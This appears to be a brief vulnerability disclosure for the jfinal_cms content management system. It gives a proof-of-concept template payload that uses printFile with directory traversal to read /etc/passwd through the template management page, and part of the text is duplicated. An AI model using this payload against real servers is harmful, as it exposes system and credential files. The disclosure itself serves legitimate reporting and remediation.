Project address:
https://github.com/jflyfox/jfinal_cms
official website:
http://mtg.jflyfox.com/
Enter the background, edit /template/includes/jquery.html in the template management , poc is as follows
${printFile('../../../../../../../../../../../../../../../etc/passwd')}
Project address: https://github.com/jflyfox/jfinal_cms official website: http://mtg.jflyfox.com/ Enter the background, edit /template/includes/jquery.html in the template management , poc is as follows ${printFile('../../../../../../../../../../../../../../../etc/passwd')}
Reopen the homepage http://localhost:8877/jfinal_cms/ , can see /etc/passwd